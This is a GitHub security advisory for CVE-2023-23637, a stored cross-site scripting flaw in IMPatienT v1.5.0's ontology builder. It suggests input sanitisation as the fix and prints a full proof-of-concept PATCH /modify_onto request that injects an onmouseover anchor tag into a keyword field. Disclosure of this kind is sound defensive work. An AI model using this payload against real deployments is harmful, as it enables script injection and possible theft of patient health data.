Headline
CVE-2023-23637: [Security] IMPatienT v1.5.0 Stored Cross-Site Scripting (XSS) - CVE-2023-23637 · Issue #101 · lambda-science/IMPatienT
IMPatienT before 1.5.2 allows stored XSS via onmouseover in certain text fields within a PATCH /modify_onto request to the ontology builder. This may allow attackers to steal Protected Health Information.
A Security Advisory has been raised for IMPatienT v1.5.0 (CVE-2023-23637):
Description:
IMPatienT v1.5.0 allows Stored Cross-Site Scripting (XSS) via onmouseover in certain text fields within a PATCH /modify_onto request.
This may allow attackers to steal Protected Health Information (PHI).
Suggested Fix:
Consider sanitizing user input parameters by removing all non-compliant characters. Additionally, you could consider encoding the user input using HTML or URL methods.
Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23637
https://nvd.nist.gov/vuln/detail/CVE-2023-23637
https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)
Payload:
PATCH /modify_onto HTTP/1.1
Host: 127.0.0.1:5000
Content-Length: 2218
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Origin: http://127.0.0.1:5000/
Referer: http://127.0.0.1:5000/ontocreate
Connection: close
[{"id":"MHO:000001","text":"Sample Keyword","icon":true,"li_attr":{"id":"MHO:000001"},"a_attr":{"href":"#","id":"MHO:000001_anchor"},"state":{"loaded":true,"opened":true,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"Sample Keyword","hex_color":"#c7ef34","hpo_datamined":"","correlates_with":"","image_annotation":false},"parent":"#"},{"id":"MHO:000004","text":"Keyword Image Annotation","icon":true,"li_attr":{"id":"MHO:000004"},"a_attr":{"href":"#","id":"MHO:000004_anchor"},"state":{"loaded":true,"opened":false,"selected":true,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"UNCLEAR","gene_datamined":"N/A","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#77e3a4","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000005","text":"Keyword Image Annotation 2<a onmouseover=alert('XSS')>XSS</a>","icon":true,"li_attr":{"id":"MHO:000005"},"a_attr":{"href":"#","id":"MHO:000005_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#094f6a","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000002","text":"Sample Keyword Child","icon":true,"li_attr":{"id":"MHO:000002"},"a_attr":{"href":"#","id":"MHO:000002_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#14cd17","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000003","text":"Sample Keyword Child 2","icon":true,"li_attr":{"id":"MHO:000003"},"a_attr":{"href":"#","id":"MHO:000003_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#d9eab9","hpo_datamined":""},"parent":"MHO:000001"}]